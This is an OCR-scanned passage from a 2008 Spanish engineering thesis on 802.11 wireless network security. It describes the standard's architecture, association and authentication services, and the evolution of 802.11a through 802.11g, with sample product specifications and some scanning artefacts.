que deben ser afrontadas por el estandar. Puede que varios BSS esten solapados entre si, que 
esten fisicamente disjuntos o que por redundancia se definan varios BSS en una misma 
localization. Para todos estos casos 802. 1 1 aporta una solution fiable. 

Pero uno de los objetivos principales de estas redes es poder comunicarse con otras 
topologias, por ejemplo con una red cableada. Para ello se utiliza el concepto de portal, que 
hace de puente entre ambas arquitecturas. Un portal permite pues una comunicacion entre 
redes 802. 1 1 y 802.x. La figura 4 muestra una description de ello. 



BSS1 



802.11 Components 




802.XLAN 



BSS 2 



Figura 3.8: Conexion con 802.x 

^Pero, como puede una estacion llegar a pertenecer y conformar un BSS o un ESS? 
Esta cuestion introduce el concepto de servicios logicos. 



3.3.1 Servicios logicos 802.11 

El estandar 802.11 no hace referenda explicita a la implementation de un servicio 
distribuido (DS), ni trata de definir una arquitectura para su realization. En vez de eso, si que 
propone el uso de un conjunto de servicios. Estos servicios estan orientados al DS y a la 
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STA, podemos hablar entonces de: servicios de estacion (SS) y servicios de sistema de 
distribucion (DSS). Ambos seran utilizados por la subcapa MAC. 

Los SS estan presentes en toda estacion del sistema, incluidos los APs y son los 
siguientes: 

• Autenticacion 

• Deautenticacion 

• Privacidad 

• Entrega de MSDU 

Por otra parte los DSSs son ofrecidos por los APs y conforman el conjunto de 
servicios que provee el sistema de distribucion para el intercambio de informacion entre APs. 
Entre ellos estan: 

• Asociacion 

• Desasociacion 

• Distribucion 

• Integracion 

• Reasociacion 

Un esquema completo de la arquitectura incluyendo lo mencionado se puede ver en la 
figura 2.9: 
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BSS1 



802.11 Components 



ss 




802.XLAN 



Figura 3.9: Esquema general 802.11 



Pero todos estos elementos representados en el esquema, deben ser direccionables, 
para poder ser accesibles. Es por ello que 802.11 utiliza un espacio de direcciones de la 
familia IEEE 802 LAN (direcciones MAC de 48 bits). Permitiendo una compatibilidad con 
estas arquitecturas. Ademas, esta abierta a multiples espacio de direcciones a la hora de 
hacer uso del DS. Por lo tanto el direccionamiento en el sistema distribuido y en medio 
inalambrico puede ser diferente, permitiendo una independencia a la hora de implementar el 
DS. 

Para que todos estos servicios puedan ser implementados se utilizan una serie de 
mensajes de comunicacion entre los elementos del sistema. Este inter cambio es realizado por 
la capa MAC mediante el uso de tres tipos de mensajes: control, gestion y datos. 

Los mensajes de control son utilizados como ayuda para hacer posible la entrega de 
datos, mientras que los de gestion sirven de apoyo a los servicios. 

Asumiremos a continuacion una red conformada por un ESS y profundizaremos un 
poco mas en los servicios ofrecidos por la 802. 1 1 . 
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3.3.1.1 Mensajes de distribucion dentro de un DS 



Distribution 



Este servicio es invocado por cada mensaje de datos que va o procede de una estacion 
perteneciente a un ESS, siempre que la trama sea enviada a traves del DS. Es decir el proceso 
seria el siguiente: una estacion de un BSS quiere enviar una trama a otra STA de otro BSS. 
La trama es entregada primero al AP de su BSS. Este AP invoca un servicio de distribucion 
en DS. Este servicio es el que se encarga de entregar al AP correcto la trama. Una vez es 
recibida por el AP que toca, este enviara por el medio inalambrico el mensaje a la estacion 
destinataria. 

La forma en que los mensajes son distribuidos por el DS no concierne al estandar 
802.11, pero si ha de definir un conjunto de information para que el DS pueda entregar el 
mensaje. Esta information es la generada por los servicios de asociacion, desasociacion y 
reasociacion. 

Puede darse el caso de que la estacion receptora del mensaje este en el mismo BSS, el 
servicio de distribucion es invocado de todas maneras y el mensaje es entregado en el mismo 
BSS. 



Integration 

Si el servicio de distribucion determina que el destinatario del mensaje es miembro de 
una LAN, el punto de salida, dentro del DS, seria un portal y no un AP. Los mensajes 
destinados pues al portal general una invocation a la funcion de integration por parte del DS. 
Esta funcion se encargara de entregar al medio LAN el mensaje, pese a que se deba realizar 
un cambio de espacio de direcciones. En el caso contrario funciona de igual manera, todo 
mensaje que llega al portal proveniente de la LAN invoca una funcion de integration seguido 
de una de distribucion. 
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3.3. 1 .2 Otros servicios que dan soporte al servicio de distribucion 

El proposito principal de la capa MAC es poder entregar MSDUs. El proceso de 
asociacion permitira conocer parametros necesarios para la entrega de estas unidades por 
parte del servicio de distribucion, proceso clave en la seguridad del sistema. Por lo tanto antes 
de que una estacion pueda transmitir o recibir cualquier tipo de informacion debera estar 
asociada. 

Para entender el concepto de asociacion primero ha de quedar claro el concepto de 
movilidad. 

Tipos de Movilidad 

Existen 3 tipos de movilidad 

• Sin transicion : la estacion no se mueve o esta dentro del mismo rango del BSS 

• Transicion entre BSSs: dentro de un mismo ESS la estacion cambia de BSS. 

• Transicion entre ESS: cambio de ESS y por lo tanto de BSS. El mantenimiento 
de la conexion debera ser realizado por capas superiores. 

Diferentes servicios de asociacion dan soporte a las diferentes categorias de movilidad. 



Asociacion 

Para entregar un mensaje el servicio de distribucion necesita saber el AP al cual esta 
adherido la estacion destine Esta informacion es producida por la funcion de asociacion. Esta 
operacion es suficiente cuando se tiene movilidad sin transicion, pero no cuando se tiene 
transaccion entre BSSs. 

Antes de que una estacion transmita, esta primero ha de invocar a la funcion de 



Roberto Amado Gimenez 
38de200 06/03/2008 



m 



Escola Tecnica Superior D'Enginyeria 
Analisis De La Seguridad En Redes 802.11 




asociacion generando un par STA - AP que recibe el sistema de distribucion. En un instante 
determinado una estacion solo puede estar asociada a un unico AP. Asegurando una respuesta 
unica a la pregunta "^Que AP esta sirviendo a esta estacion?". 

Una estacion puede ver el conjunto de APs a su alcance e invocar a la funcion de 
asociacion, para un determinado AP. 

Reasociacion 

Como hemos comentado antes el proceso de asociacion solo sirve para una movilidad 
sin transicion. Si se requiere que la estacion pueda cambiar de BSS pero no de ESS, se invoca 
a la funcion de reasociacion. Esto permite cambiar el mapa AP-STA que maneja el DS. Este 
proceso es siempre invocado por la estacion que esta en movimiento. 



Desasociacion 

El proceso de desasociacion es invocado cada vez que se desea terminar con una 
asociacion. 

Puede ser requerido por cualquiera de las dos partes involucradas en el proceso, tanto 
una estacion que no es punto de acceso como un AP. Nunca podra ser revocada por ninguno 
de los dos. 



3.3.1.3 Acceso y confidencialid ad 

IEEE 802.11 intenta proveer funcionalidades equivalentes a las redes cableadas. 
Estas asumen el control del medio fisico con unas caracteristicas mas o menos constantes. En 
este caso al tratarse de un medio inalambrico, las condiciones pueden ser variables. 

Por lo tanto se requeriran algunos servicios adicionales para proveer la funcionalidad 
de una linea cableada; autenticacion y privacidad. EL primero se refiere a lo que se podria 
llamar en un entorno fisico cableado "conectarse", mientras que el segundo intenta imitar los 
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criterios de confidencialidad de una red 802.3. 



Autenticacion 



Un sistema cableado proporciona, por si solo, un nivel mas elevado de seguridad. 
Usando el aire como medio de transmision, este factor se ve decrementado notablemente. El 
proceso de autenticacion permite controlar el acceso a la LAN. Este servicio es usado por 
todas las estaciones para establecer sus identidades con las STAs con las que se quieran 
comunicar. Se ha de llevar a cabo con exito este proceso para que pueda darse una asociacion. 

El estandar puede funcionar con dos metodos de autenticacion; como sistema abierto y 
con clave compartida explicados con mas detalle en el punto 2.3.3. 

Una estacion puede estar autenticada con varias estaciones en un momento dado. Este 
servicio puede ser invocado independientemente de la asociacion. 

Existe un proceso de preautenticacion que permite reducir el tiempo de autenticacion 
cuando se produce una invocacion de reasociacion. 



Deautenticacion 

Este servicio producira por lo tanto una desasociacion de la estacion, ya que la 
autenticacion es un prerrequisito que ha de cumplir todo proceso de asociacion. La 
deautentificacion es una notificacion y no una peticion. Tanto un AP como una estacion 
pueden realizarla. 



Privacidad 

En una LAN cableada, solo las estaciones que estan fisicamente conectadas pueden 
escuchar el trafico de la red. En el caso de un medio sin cables esto conforma un serio 
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problema de seguridad, ya que una unica conexion inalambrica perteneciente a la red cableada 
podria llegar a comprometerla en su totalidad. 

La informacion pues, debera ser encriptada para poder equipararse al nivel de 
seguridad que tienen los sistemas cableados. 802.11 especifica el algoritmo WEP (Wired 
Equivalent Protocol) que al menos, puede producir un nivel supuestamente equivalente al 
cableado. 

Si una estacion intenta transmitir datos sin encriptar o con una clave no valida a un 
AP, este desechara los marcos de datos, sin informar a la capa LLC. 

Para poder dotar al sistema con una cierta seguridad y privacidad cada estacion 
maneja una maquina de estados, que le provee de una capacidad para usar unos servicios u 
otros. Veamos como es esta relacion. 



3.3.2 Relaciones entre los servicios 

Cada estacion mantiene 2 variables por cada STA con el que quiera comunicar; estado 
de la asociacion y estado de la autenticacion. Por lo tanto esta relacion puede estar en tres 
estados, como muestra la figura siguiente. Para cada estado se definen un grupo/clase de 
marcos que son aceptados. 



Notificacion de 
DesAutenticacion' 




Ttamas de 
clasG 1 



Notification de 
DesAutenticacion 



Ttamas de 
clase 1 y 2 



Notification de 
DesAsociacion 



Tramas de 
clase1,2y3 



Figura 3.10: Relacion entre estados y servicios 
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Encontramos pues, tres tipos de marcos. En cada estado se aceptan una serie de 
marcos u operaciones permitidas: 

• Clase 1, no autenticado y por lo tanto no asociado. 

• Clase 2 ,si y solo si ha sido previamente autenticado 

• Clase 3 ,si y solo si ha sido previamente asociado 

El proceso que realiza un cliente para encontrar y asociarse con un AP es el siguiente: 

Los AP transmiten "BEACON FRAMES" (o paquetes de anuncio) cada cierto 
intervalo de tiempo fijo. Para asociarse con un AP y unirse a una red en modo infraestructura 
(modo en el cual el AP hace las funciones de coordinador de la red, centralizando todo el 
trafico), un cliente escucha en busca de "BEACON FRAMES" para identificar Puntos de 
Acceso. El cliente tambien puede enviar una trama "PROVE REQUEST" que contenga un 
ESSK) determinado para ver si le responde un AP que tenga el mismo ESSID. Despues de 
identificar al AP, el cliente y el AP realizan autenticacion mutua intercambiando varios 
"management frames" (o paquetes de gestion) como parte del proceso. Hay varios 
mecanismos de autenticacion posibles que veremos con mas detalle un poco mas adelante. 



Despues de una autenticacion realizada con exito, el cliente pasa a estar en el segundo 
estado (autenticado y no asociado). Para llegar al tercer estado (autenticado y asociado) el 
cliente debe mandar una trama "ASSOCIATION REQUEST" y el AP debe contestar con una 
trama "ASSOCIATION RESPONSE", entonces el cliente se convierte en un "Host" mas de la 
red inalambrica y ya esta listo para enviar y recibir datos de la red. 

Pongamos un ejemplo de que ocurriria si una estacion A recibe un marco de datos de 
clase 3 con una direccion "Unicast", de otra estacion B y esta no esta ni autenticada ni 
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asociada. La STA A entonces enviara un mensaje de deautenticacion a B avisandole. Puede 
darse el caso de que si este autenticada pero no asociada, por lo tanto se enviaria una 
notificacion de desasociacion. Cabe hacer notar que para una configuration donde solo exista 
un BSS, por ejemplo en una red "Ad hoc" solo se intercambiaran marcos de clase 1 y 2, y 
solo se invocan servicios tipo SS. 

Pero, ^como se produce este proceso de autenticacion, clave en la seguridad del 
sistema? El siguiente punto trata de exponer este proceso y la serie de pasos que se llevan a 
cabo para realizarlo. 



3.3.3 Autenticacion 

Ya que uno de los objetivos de este proyecto es mostrar los diferentes modelos de 
conexion supuestamente segura, es por eso que cabe destacar el proceso de autenticacion 
dentro del estandar. Mas tarde hablaremos de privacidad en mas detalle y los diferentes 
algoritmos para conseguirla. 

IEEE 802.11 define dos tipos de autenticacion: autenticacion en sistema abierto y 
autenticacion de clave compartida. El metodo elegido vendra declarado en el cuerpo del 
marco de gestion de autenticacion. Estos deberan ser unicast, sin embargo no ocurre los 
mismo con los marcos de deautenticacion, que permiten elegir direcciones broadcast, 
multicast o unicast. 

Este proceso se puede dar en modo infraestructura entre un AP y una estacion de un 
BSS o en modo "ad hoc" entre dos estaciones de un IBSS. 



Sistema de autenticacion abierto 

Es el mecanismo de autenticacion mas simple que existe. Cualquier estacion que pida 
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autenticacion usando este metodo se llevara a cabo si la STA receptora tiene el campo 
"ifdotllAuthenticationType" un valor "Open". Este proceso no quiere decir que siempre se 
realice con exito la autenticacion, puede ser que una estacion no quiera establecer relacion con 
otra en particular. 

A continuation se explica el proceso en la Figura 7 en tres sencillos pasos utilizando 2 
marcos: 



Client 
attempting 
to con nect 



802.11 Authentication 
Open System Steps 

1 ) Aiuthe ntication requ est se nt to AP 

, i 

2} AP authenticates 

•< 

3) Clientconnects to network 



Access Point (AP) 




■ -. ■ __my : J -mieinei 



Figura 3.11: Autenticacion en un sistema abierto 



1. La estacion que inicia el proceso envia un marco de autenticacion a la STA 
destino, en un modo infraestructura un AP. 

2. El punto de acceso autentifica a la estacion si todo ha ido correcto. 

3. EL cliente pasaria a asociarse. 



Sistema de autenticacion por clave compartida 

Permite la autenticacion de cualquier STA que conozca la clave preestablecida por la 
estacion receptora. Todo esto se realiza sin la necesidad de enviar la clave por el medio. 
Requiere pues del mecanismo WEP de privacidad. Se presupone que la clave compartida se 
ha entregado a los participantes de antemano bajo un canal seguro. Durante el proceso de 
autenticacion, se transmite 2 tipos de informacion; el reto y el reto cifrado. 



44 de 200 



Roberto Amado Gimenez 
06/03/2008 



m 



Escola Tecnica Superior D'Enginyeria 



Analisis De La Seguridad En Redes 802.11 




A continuacion se describira brevemente el proceso, mostrado en la Figura 2.12: 



Client 
attempting 
to connect 



802.11 Authentication 
Shared Key Steps 

1 '} Authe nt ication fr 

request sentto AP 



2) A.P sends challenge text 



3) Client encrypts 
challenge text and 
sends it back to AP 



43 A.P decrypts, and if correct, 
authenticates client 



5) Client connects to network 



Access Point (AP) 




^*- 



caueof 



Figura 3.12: Autenticacion en un sistema cerrado 

1 . La estacion que quiere conectarse al AP envia una peticion de autenticacion. 

2. El AP contesta, enviando un texto piano (reto) para que la STA de origen lo 
encripte. 

3. EL cliente encripta el texto usando la clave compartida y se lo envia al AP. 

4. Si el texto cifrado coincide con el texto cifrado por el AP, entonces este lo 
autentifica. 

El concepto de privacidad y los metodos para conseguirla seran explicados mas 
adelante. 



3.4 EVOLUCION DEL ESTANDAR 

La norma 802.11 esta conformada por una serie de grupos de trabajo, cada uno de los 
cuales dedicado a un desarrollo particular en el ambito de la tecnologia inalambrica. A 
continuacion se presenta la evolucion que el estandar ha sufrido desde que viera la luz su 
primera version en el afio 1997. Algunos de los grupos de trabajo que se explican a 
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continuacion estan en fase de desarrollo, mientras que otros estan consolidados y extendidos 
en el ambito cotidiano de la ingenieria. 



3.4.1 802.11A(1999) 

En 1999 el IEEE publica el estandar 802.11a, apareciendo en el mercado los primeros 
productos compatibles con la norma hacia el ano 2001. Todavia hoy en dia se siguen 
comercializando ya que presentan una serie de ventajas respecto a dispositivos desarrollados 
posteriormente, como 802.1 lb/g. La norma 802.1 la utiliza la banda de los 5GHz, esto le hace 
mas resistente a interferencias producidas por otros aparatos domesticos como hornos 
microondas, dispositivos Bluetooth. Sin embargo, la utilizacion de esta banda tambien tiene 
sus desventajas, dado que restringe el uso de los equipos 802.11a a unicamente puntos en 
linea de vista, con lo que se hace necesario la instalacion de un mayor numero de puntos de 
acceso. Por otra parte presenta un amplio rango de canales, los cuales permiten realizar una 
cobertura mucho mayor de celdas a la hora de disenar una red inalambrica sin interferencias. 
Por el contrario 802.11a es incapaz de interoperar con dispositivos de otras normas de su 
familia, como podrian ser 802.11b o 802.1 lg ya que trabajan en otra frecuencia, presentan 
arquitectura distinta y utilizan modulacion diferente. Los productos desarrollados solo bajo 
este estandar presentan un coste mas elevado. En lo referente al consumo y area de cobertura 
tambien se ven superados por sus hermanos 802.1 lb/g. 



La norma 802.11a fue creado por el IEEE americano, pero paralelamente en Europa 
tambien se ha estado trabajando en medios inalambricos para redes locales. Fruto de ello es el 
estandar HIPERLAN/1 creado por el ETSI y que vio la luz en 1996. Ambos son 
incompatibles debido a razones de diseno, modulacion y frecuencia. Mas tarde en el ano 
2000 se termina de desarrollar el HIPERLAN/2, muy parecido a 802.11a trabajando en los 
5GHz, con igual velocidad de transmision pero incompatibles nuevamente. Actualmente el 
estandar americano ha ocupado el lugar en el mercado del viejo continente que le hubiera 
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podido corresponder a la aproximacion europea. Cabe destacar que HIPERLAN/2 presenta 
una solucion que permite QoS, ademas de una modulacion adaptativa TDMA muy parecida a 
la utilizada por WIMAX (estandar inalambrico WAN). Las especificaciones de 
HIPERLAN/2 estan siendo desarrolladas por el TC (comite tecnico) BRAN. Estos a su vez 
estan trabajando en cooperacion con MMAC (grupo de trabajo de alta velocidad inalambrica 
japones). El MMAC es un sistema movil de acceso inalambrico que permite tasas de 
transmision en torno a lGbps, usando la banda SHF de 3-60GHz. Una ilustracion 
comparativa de las diferentes tecnologias se ve en la Figura 2.13. 
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Figura 3.13: Diferentes tecnologias inaldmbricas y relacion entre grupos de trabajo 



Como puede observarse en la figura la ITU es la encargada de coordinar a los grupos 
de trabajo. MMAC comenzo su desarrollo en el ano 1996 y preve tener resultados hacia el 
ano 2008, entre otras caracteristicas presenta compatibilidades con la norma 802. 1 1 . 

Esta es una vision global del estado del arte y trabajos futuros en comunicaciones para 
redes de area local actualmente en America, Europa y Japon. Pero volvamos a lo que acontece 
a este proyecto que es la norma americana. A continuacion se tratara de dar una aproximacion 
del estado actual del mercado en cuanto a esta tecnologia, exponiendo algunos productos y 
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precios. 

Actualmente el mercado ofrece una amplia oferta de dispositivos compatibles a su vez 
con la norma 802.11b/g, pero en menor medida con 802.11a/b/g. La amplia aceptacion e 
implantacion de estos productos ha producido un descenso del precio, lo cual permite que 
cualquier persona pueda desplegar una red inalambrica en su casa sin excesivo coste. A 
continuacion se muestra un ejemplo de tres dispositivos compatibles con las variantes a/b/g de 
la norma. 



■ 


PCMCIA Marca Buffalo 

Trabaja en 802.1 la+b+g 

Incorpora amplificador. 

Hasta 108Mbps 

Encriptacion WPA (TKIP. AES) y WEP 64/128bits 






1. 


1 






/ 


Marca: Ovislink 

Tipo: Antena tipo varilla. 

Cobertura: Omnidireccional (360°H, 30°E). 

Instalacion: Directa al conector SMA del Punto de acceso. 

Rango de frecuencia: 2.4 -2.5 Ghz. 

Impedancia: 50 Ohmios nominales. 

VSWR: Menos de 2 

Ganancia: 10 dBi. 

Polarizacion: Vertical. 

Conector: SMA (Hembra). 

Peso: 45g 

Dimensiones: 39,5 x 1 cm 
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Ci 


Router Marca Buffalo 

Potencia de 84mW 

Dual (802.11a y 802. llg) 

Hasta 108Mbps (Super A y Super G) 

Encriptacion WPA-PSK (TKIP, AES) y WEP de 64/128bits 

Incluye NAT/Firewall SPI y detector de intrusos 



La principal aportacion del grupo de trabajo 802.11a con respecto a 802.11 es la 
definicion de una nueva capa fisica que permita velocidades superiores a los 1Mbps y 2Mbps 
del primer estandar. Para ello contemplan el uso de OFDM para la banda de 5GHz. 



3.4.2 802.11B (1999) 

En 1999, el IEEE aprueba el estandar 802.11b "High Rate" (tambien llamado Wi-Fi), 
consiguiendo un ancho de banda de 11Mbps, mucho mayor de los 1Mbps y 2 Mbps del 
802.11 legacy. 

En 1998 Lucent Technologies y Harris Semiconductors propusieron al IEEE un nuevo 
estandar llamado 802.11b, que introducia como novedad el metodo CCK (Complementary 
Code Keying) con el fin de poder transmitir a 11Mbps. Para lograr dicho rendimiento 
realizaron un cambio de codificacion de datos utilizando CCK. En vez de usar el Codigo 
Barker se usan series de secuencias complementarias que cuentan con 64 unicas palabras que 
pueden usarse. En contraposicion al Codigo de Barker, por CCK se pueden representar 6 bits 
de datos en una sola palabra y no 1 bit de datos por palabra como hacia el Codigo Barker. 
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La norma, 802.11b, ofrecellMpbs teoricos, en las mejores condiciones. Bajo esta 
norma, se transmite en unos 5.9 Mbps en promedio para TCP y 7.1 Mbps para UDP. Lo cual 
es una excelente velocidad para videoconferencia, Internet, etc. Cabe destacar que la norma 
"b" utiliza el mismo acceso al medio que el estandar original, el ya comentado CSMA/CA, el 
cual introduce un cierto "overhead" al sistema. 

Los primeros productos 802.11b aparecieron muy rapidamente en el mercado debido a 
la rectificacion de codificacion en DSSS comentada anteriormente. Asi pues los integrados de 
los productos fueron facilmente actualizados a la nueva codificacion soportando las mejoras 
de 802.11b. Este repentino salto de rendimiento comparado con el del estandar original, asi 
como un descenso de los precios debido a la rapida aceptacion del producto por parte de los 
usuarios produjo el asentamiento de la norma como la tecnologia inalambrica definitiva para 
redes de area local. 

802.11b suele ser utilizado para conexiones tipo punto-multipunto, donde un AP se 
comunica de forma omnidireccional con uno o mas clientes dentro del area de cobertura. 
Valores tipicos del area que puede llegar a cubrir en localizaciones interiores son 30 metros a 
1 1 Mbps y 90 metros a 1 Mps 

Con antenas de alta ganancia externas, el protocolo puede ademas ser usado para 
conexiones tipo punto-punto, con coberturas de hasta 8 Km. Existen algunas experiencias de 
conexiones con linea directa que han alcanzado de 80 a 120 Km. En Espafia asociaciones 
como Fadaiatl han conseguido establecer un enlace inalambrico uniendo el Estrecho de 
Gibraltar. 

Debido a que estas ondas son consideradas como microondas, de algun modo pueden 
ser perjudiciales para la salud, es por eso que los desarrolladores e ingenieros deben cenirse a 
las limitaciones legates en cuanto a la potencia efectiva irradiada. La radiacion 
electromagnetica de 2,4 GHz es absorbida por el agua y por tanto la calienta (hornos de 
microondas). Por tanto un emisor inalambrico podria calentar el tejido humano, lo cual 
plantea posibles problemas de salud. Sin embargo en realidad la potencia radiada es tan baja 



1 http://fadaiat.net/ 
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(100 mW maximo) que el efecto es despreciable. Es mayor la influencia de un homo de 
microondas en funcionamiento. Comparado con la telefonia movil un terminal GSM transmite 
con mas potencia (hasta 600 mW) y se tiene mucho mas cerca del cuerpo normalmente 
(aunque GSM no emite en la banda de 2,4 GHz). 

Por otro lado los equipos de la familia 802.11 normalmente solo emiten cuando 
transmiten datos. Un telefono GSM emite siempre que esta encendido. 

Retomando nuevamente la tasa de operabilidad del estandar, este puede funcionar all 
Mbps, pero puede descender a 5.5 Mbps, 2 Mbps incluso 1Mbps, si la calidad de la serial se 
ve decrementada. Este proceso recibe el nombre de Seleccion Adaptativa de Ratio. Claro 
esta, ratios bajos de transmision utilizan gran redundancia en los datos y menos complejidad 
en la comunicacion, para veneer las atenuaciones introducidas en el medio. Existen 
extensiones a esta norma las cuales permiten un incremento en la velocidad de transmision. 
Velocidades de 22, 33, 44 Mbps, han podido ser alcanzadas con versiones propietarias no 
aceptadas por el IEEE. Muchas companias de telecomunicaciones han hecho publicas 
versiones de la norma 802.11b+, las cuales han sido sucumbidas por la aparicion del estandar 
802. llg, que permite transmisiones a 54 Mbps, ademas de una plena compatibilidad con 
802.11b. 



Actualmente el mercado ofrece una amplia oferta de dispositivos compatibles a su vez 
con la norma 802.11b/g. La amplia aceptacion e implantacion de estos productos ha 
producido un descenso del precio, lo cual permite que cualquier persona pueda desplegar una 
red inalambrica en su casa o en la empresa sin excesivo coste. A continuation se muestra un 
ejemplo de tres dispositivos compatibles con las variantes b/g de la norma. 
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Marca: PCMCIA Conceptronic. 

Modos: ad-hoc. infraestructura, monitor 

Alcance/Velocidad: 0-120m l-54Mbps 

Estandar: 802.11b (11Mbps) y 802.1 1G (54Mbps) 

Frecuencia: 2,40 y 2,48 GHz 

Seguridad: WEP (codification) 64-128-152 bit, WPA 


•=i» 


Marca: AP Conceptronic 

Interfaz:10/100Base-T 

Velocidad: hasta 54 Mbps 

Frecuencia: 2.40 y 2.48 GHz 

Canales: hastal3 subcanales diferentes 

Memoria: Flash EEPROM ampliable para nuevas funciones. 

Distancia maxima: 30-60 metros en edificios. 

Seguridad: Soporta 64, 128 y 152 WEP SSID, MACAVPA psk. 



Cabe destacar la diferencia de precios con respecto a los productos que actualmente se 
comercializan para el estandar 802. 11a. 

Han existido intentos de soluciones alternativas a este estandar con tecnologias 
totalmente diferentes pero que presentaban un rendimiento similar. Este es el caso de 
HomeRF, el grupo que desarrollaba este estandar inalambrico se disolvio en Enero de 2003. 
La idea de este estandar se basaba en el telefono inalambrico digital mejorado (Digital 
Enhaced Cordless Telephone, DECT) que es un equivalente al estandar de los telefonos 
celulares GSM. Transporta voz y datos por separado. Al contrario de 802. 1 1 que transports la 
voz como una forma de datos. Los creadores de este estandar pretendian disefiar un aparato 
central en cada casa que conectara los telefonos y ademas proporcionar un ancho de banda de 
datos entre las computadoras. 
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3.4.3 802.11C (2001) 

802.1 lc fue desarrollado y publicado en 2001 por el IEEE, formando parte hoy en dia 
de la norma 802.1 ID. Trata de definir las caracteristicas que necesitan los APs para actuar 
como puentes de red (bridges). Este estandar esta completamente desarrollado y sirve de 
apoyo para el mencionado grupo 802.1 ID, dotando a las capas MAC de otras normas, de 
conectividad. Tratando de modificar el estandar LAN basico para acomodar tramas 802. 1 1 y 
asi poder comunicar varias topologias de red. En particular afiade una subclausula a la capa 
interna de servicio para dar cobertura a la funcionalidad de enlace entre capas MAC. Los 
desarrolladores implementan esta tecnologia para producir APs. Sin embargo no existe nada 
relevante en esta norma para los ingenieros que quieran desplegar una red inalambrica. 
Asegura una compatibilidad absoluta con productos de la norma como 802.1 la y 802.1 lb. 

Suele ser utilizado por universidades y empresas que necesitan realizar un amplio 
despliegue de cobertura dentro de la oficina o el campus, requiriendo pues, capacidades de 
"bridging". La siguiente imagen muestra un AP que implementa la norma. 







Figura 3. 14: AP 802.11c compatible 



3.4.4 802.1 ID (2001) 

El principal objetivo de este grupo de trabajo era poder establecer una compatibilidad 
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entre diferentes regiones debido a politicas locales. Asi pues se le suele llamar "World Mode" 
o modo mundial y esta referida, a cuantos y que canales de comunicacion estan disponibles 
en un pais para poder acomodar el estandar a la region en el cual es usado. Un usuario tan 
solo debe introducir en que pais se encuentra y el controlador realizara el resto. Ademas 
constituye un complemento al nivel de control de Acceso al Medio(MAC) en 802.11, 
permitiendo a los puntos de acceso comunicar informacion sobre los canales de radio 
admisibles con niveles de potencia aceptables para los dispositivos de los usuarios. 802. lid es 
utilizado en el desarrollo de productos compatibles con 802.11a/b/g. Esta especificacion fisica 
elimina la necesidad de tener que disenar y manufacturar productos especificos para cada 
dominio regulatorio. Activando el modo de funcionamiento 802.1 Id en el AP, produce un 
envio "broadcast" del codigo de pais ISO para la region en el cual esta funcionando, como 
parte de los paquetes de anuncio y de prueba. El cliente ajusta automaticamente su frecuencia, 
nivel de potencia y ancho de banda, siendo bastante apropiado para proporcionar "roaming" 
global. 




Figura 3.15: AP que implementa la norma 802.1 Id 



3.4.5 802.1 IF (2003) 

Este estandar fue ratificado y publicado en 2003. IEEE recomendaba su uso como 
prueba, siendo finalmente retirado por el comite de 802 a principios del 2006. Define la 
interaccion entre APs posibilitando la comunicacion entre sistemas de varios vendedores. El 
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protocolo esta disefiado para proporcionar una ejecucion de asociacion unica dentro de un 
ESS y reforzar la seguridad en el intercambio entre el AP en el que se encuentra asociado el 
cliente y el siguiente. Se basa en niveles de seguridad, utilizando un servidor RADIUS para el 
intercambio de claves. Este servidor proporciona una relacion direccion MAC del AP e IP. 



3.4.6 802.1 1G (2003) 

En 2003 se hizo publico el estandar 802.1 lg, el cual conforma junto con el 802.11b y 
802.11a un mayor despliegue en el entorno de la ingenieria. Totalmente compatible con la 
norma "b" presenta un avance significativo en cuanto al ancho de banda proporcionando un 
menor consumo y un mayor alcance que 802.11a. La norma "g" utiliza la banda de 2.4 Ghz 
(al igual que el estandar 802.11b) pero opera a una velocidad teorica maxima de 54 Mbit/s, o 
cerca de 24.7 Mbit/s de velocidad real de transferencia, similar a la del estandar 802.11a. 
Como ya se ha comentado es compatible con el estandar "b" ya que utiliza las mismas 
frecuencias. Aunque cabe hacer notar que el rango en el cual puede operar a maxima 
velocidad es menor en comparacion con el de 802.11b. Buena parte del proceso de diseno del 
estandar se fundamento en hacer compatibles los dos estandares. Sin embargo, en redes bajo 
el estandar 802. 1 lg la presencia de nodos bajo el estandar "b" reduce significativamente la 
velocidad de transmision. 

Los equipos que trabajan bajo el estandar 802. 1 lg llegaron al mercado muy 
rapidamente, incluso antes de su ratificacion. Esto se debio en parte a que para construir 
equipos bajo este nuevo estandar se podian adaptar los ya disenados para el estandar 
"b"Actualmente se venden equipos con esta especificacion, con potencias de hasta medio 
vatio, que permite hacer comunicaciones de hasta 50 km con antenas parabolicas apropiadas. 
Ademas algunos fabricantes propusieron nuevos desarrollos donde productos del estandar "a" 
y "b" se convirtieron en compatibles en banda dual y tri-modo soportando tambien la norma 
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Por lo que respecta a las especificaciones tecnicas, implementa una modulacion 
OFDM o multiplexacion ortogonal por division en frecuencia, para tasas de transferencia de 
6, 9, 12, 18, 24, 36, 48 y 54 Mbps. Pudiendo funcionar con CCK (codificacion de codigo 
complementario) para 5.5 /ll Mbps y DBPSK/DQPSK+DSSS para ratios de 1 y 2 Mbps. La 
nueva norma "g" sigue teniendo los mismos problemas de interferencias que tiene la "b" ya 
que funcionan en la misma frecuencia. Este ruido es debido a hornos microondas, dispositivos 
Bluetooth y telefonos moviles. 

A continuacion se muestran algunos dispositivos comerciales compatibles con la 
norma. 

El modelo WG-LAPBC es un punto de acceso que cumple con el estandar IEEE 
802.1 lg y es capaz de hacer roaming transparentes para nodos de wireless (DSSS). Tambien 
provee la funcion WDS para conectar varios puntos de acceso sin cableado ademas de 
comunicarse a la vez con clientes wireless. 




Especificaciones Compatible IEEE802. 1 lb y 1 lg 

Frecuencia: 2.4 GHz 

Multi-Funcion: Modo Punto de Acceso. Modo WDS 

Velocidad hasta 54Mbps 

Configuration via WEB 

Encriptacion WEP de 64 y 128 bits, y WPA 

Antena doble desmontable conector SMA reverse 

Potencia de transmision 12dBm en 802.1 lg y 15dBm en 802.1 lb 

Sensibilidad: -81dBm tipico con 8 % PER (Packet Error Rate) a 
11Mbps 

-68 dBm tipico con 10 % PER a 54Mbps 
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Interfaz Un puerto R.T-45 10/1 00Mbps 

Led 1 Link, 1 Alimentation, 1 Actividad 

Dimensiones 139.5 x 1 14.5 x 29.4 mm (sin antenas) 

Alimentacion Fuente de alimentacion externa 7.5V, 1A (consume 
6W max). 

Tarjetadered OVISLINK 




Conexion: PCI 

Velocidad: 54 Mbps 

Compatibilidad: 802.11b / 802.1 lg 

Seguridad: WPA / WEP 

Sistemas operativos: Windows 98SE/ME/2000/XP 



Un posible competidor del estandar 802.1 lg, 5-UP, nace en 2003 con el objetivo de 
unificar las normas 802.11a y HIPERLAN/2 en la banda de los 5Ghz. El encargado de este 
